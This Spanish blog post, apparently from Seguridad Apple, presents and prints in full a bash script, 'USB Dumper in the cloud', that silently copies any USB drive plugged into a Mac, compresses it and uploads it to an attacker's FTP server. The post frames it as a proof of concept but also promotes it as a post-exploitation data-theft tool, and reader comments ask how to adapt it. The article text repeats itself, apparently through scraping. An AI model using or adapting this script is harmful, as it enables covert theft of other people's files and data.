USBDumper es un pequeño script desarrollado en Octubre del año pasado para Seguridad Apple desde el equipo de auditoría de aplicaciones web de Informática64, y cuya finalidad era demostrar en una prueba de concepto (POC), que se pueden robar los datos de los pendrives que se conectan a nuestro equipo Mac OS X fácilmente, y luego sacar el "jugo" de los datos robados.
Tal y como se comentó en el artículo USB Dumping en Mac OS X, este tipo de ataques resulta muy efectivo en entornos de trabajo en donde un compañero te pide la impresión de un documento, o la copia de determinado fichero de un dispositivo extraíble, siempre bajo su supervisión. Sin embargo, desde el momento en que se conecta el pendrive a nuestro querido Mac OS X, éste empezará a realizar un copiado del pendrive de forma totalmente transparente en el directorio /tmp/Volumes/.
La nueva versión de este programa para hacer USB Dumping, que ha sido desarrollada a petición de un lector asiduo de Seguridad Apple, incorpora la nueva funcionalidad de comprimir el contenido del dispositivo y subirlo a un servidor FTP. De este modo, el atacante – o ladrón de datos – dispondrá de sus backups en la nube.
Sabemos que podríamos haber resuelto el problema de sinconización con la nube añadiendo la carpeta donde se copian los backups a la lista de carpetas a sincronizar con algún servicio de online backup, como Dropbox o Zendal Backup, pero entonces no podría usarse como una herramienta de post-explotación en una máquina.
De esta forma, el script serviría para controlar una máquina explotada o podría ser una aplicación ideal para complementar un ataque David Hasselhoff, ya que además de hacerle una pequeña "broma" en su escritorio, estará subiendo al servidor FTP el contenido de sus dispositivos, a los cuales tendremos acceso incluso sin necesidad de que el usuario se vuelva a dejar desbloqueado el equipo.
A continuación mostramos el código de la nueva versión de USB Dumper "in the cloud" , el cual requiere que se editen las variables SERVER, USERNAME y PASSWORD, localizadas en las primeras líneas del script.
A continuación mostramos el código de la nueva versión de USB Dumper in the cloud, al cual es necesario editarle las variables SERVER, USERNAME y PASSWORD localizados en las primeras líneas del script.
Tal y como se comentó en el artículo USB Dumping en Mac OS X, este tipo de ataques resulta muy efectivo en entornos de trabajo en donde un compañero te pide la impresión de un documento, o la copia de determinado fichero de un dispositivo extraíble, siempre bajo su supervisión. Sin embargo, desde el momento en que se conecta el pendrive a nuestro querido Mac OS X, éste empezará a realizar un copiado del pendrive de forma totalmente transparente en el directorio /tmp/Volumes/.
La nueva versión de este programa para hacer USB Dumping, que ha sido desarrollada a petición de un lector asiduo de Seguridad Apple, incorpora la nueva funcionalidad de comprimir el contenido del dispositivo y subirlo a un servidor FTP. De este modo, el atacante – o ladrón de datos – dispondrá de sus backups en la nube.
Sabemos que podríamos haber resuelto el problema de sinconización con la nube añadiendo la carpeta donde se copian los backups a la lista de carpetas a sincronizar con algún servicio de online backup, como Dropbox o Zendal Backup, pero entonces no podría usarse como una herramienta de post-explotación en una máquina.
De esta forma, el script serviría para controlar una máquina explotada o podría ser una aplicación ideal para complementar un ataque David Hasselhoff, ya que además de hacerle una pequeña "broma" en su escritorio, estará subiendo al servidor FTP el contenido de sus dispositivos, a los cuales tendremos acceso incluso sin necesidad de que el usuario se vuelva a dejar desbloqueado el equipo.
A continuación mostramos el código de la nueva versión de USB Dumper "in the cloud" , el cual requiere que se editen las variables SERVER, USERNAME y PASSWORD, localizadas en las primeras líneas del script.
Figura 1: USB Dumper enviando el backup a la nube |
A continuación mostramos el código de la nueva versión de USB Dumper in the cloud, al cual es necesario editarle las variables SERVER, USERNAME y PASSWORD localizados en las primeras líneas del script.
#!/bin/bash #www.seguridadapple.com SERVER="host" USERNAME="user" PASSWORD="password" function saveDefaultDevices() { rm -rf /tmp/usblist /tmp/Volumes mkdir /tmp/Volumes for vol in /Volumes/* do echo $vol >> /tmp/usblist echo "Detecting $vol as default" done } function checkDevices() { for vol in /Volumes/* do aux=`cat /tmp/usblist |grep -i "$vol"` aux=`echo $?` if [ $aux -eq 1 ]; then nombre=`echo $vol | awk -F "/" '{print $3}'` echo $vol >> /tmp/usblist mkdir "/tmp$vol"? echo "[+] Dumping $vol in /tmp$vol" sleep 1 cp -R "$vol" "/tmp/Volumes/" auxVol="/tmp/$nombre.zip" rm -rf $auxVol echo "Compressing files [ /tmp$vol in $auxVol ]" zip -r "$auxVol" "/tmp$vol" > /dev/null echo "Uploading to FTP" ftp -n -i $SERVER <<EOF user $USERNAME $PASSWORD binary put "$auxVol" "$nombre" quit EOF echo "[+] Done" fi done } saveDefaultDevices while [ 1 ]; do checkDevices sleep 1 done |
Me ha gustado el script, es interesante lo que se puede hacer con unas pocas líneas de código.
ResponderEliminarEntiendo que es solo un POC pero para ponerlo en "producción" habría que tener muchas mas cosas en cuenta ¿que sucede si conectan por USB un disco duro de 1TB? ¿se copiaria todo el disco duro? el usuario del disco duro se daria cuenta porque la lucecita empezaria a parpadear como una descosida mientras copia todo el contenido y rápidamente nos quedariamos sin espacio en nuestro ordenador (o en nuestro FTP)
Habría que controlar los archivos grandes que sería una bestialidad enviarlos por FTP
buen aporte.
Gracias!
Interesante herramienta. No he encontrado referencias sobre Android, aunque imagino que el rubber duckie no tendría mayores problemas en exportar - por ejemplo - el sql.lite de Whatsapp. Gracias por el aporte
ResponderEliminarMuy interesante, sólo por conectarlo hace su trabajo? Genial!!
ResponderEliminartengo una pregunta, si no quiero usar el ftp como hago para inhabilitar e
ResponderEliminarsa funcion?